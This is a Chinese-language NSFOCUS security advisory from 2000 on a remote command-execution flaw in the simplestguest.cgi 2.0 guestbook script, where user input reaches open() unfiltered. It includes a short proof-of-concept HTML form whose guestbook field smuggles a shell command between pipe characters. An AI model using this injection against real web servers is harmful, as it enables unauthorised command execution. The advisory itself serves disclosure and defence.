安全研究
安全漏洞
simplestguest.cgi可远程执行命令
发布日期:2000-12-15
更新日期:2000-12-15
受影响系统:
Leif M. Wright simplestguest.cgi 2.0
描述:
Leif M. Wright编写的simplestguest.cgi
(
http://www.conservatives.net/atheist/scripts/index.html?Download&simplestguest)
是一个用来处理网站访问者向留言簿提交留言的脚本,它对输入进行合法性检查时存在一
个漏洞。
由于在调用open( )函数时未能正确地从用户提供的输入中过滤掉shell元字符,结果攻击
者可以使该脚本以web服务器的权限执行任意shell命令。
<*来源:suid(
suid@sneakerz.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
通过下面的HTML来运行远程服务器的simplestguest.cgi脚本:
<form action=/cgi-bin/simplestguest.cgi method=POST>
<input type=hidden name=required value="NAME">
<input type=hidden name=guestbook
value=" | <command goes here> |">
<input type=hidden name="NAME" value="X">
<input type=submit>
</form>
建议:
临时解决办法:
NSFOCUS建议您自行修改该CGI脚本,增加对shell命令和元字符的过滤。
厂商补丁:
暂无。
浏览次数:6219
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |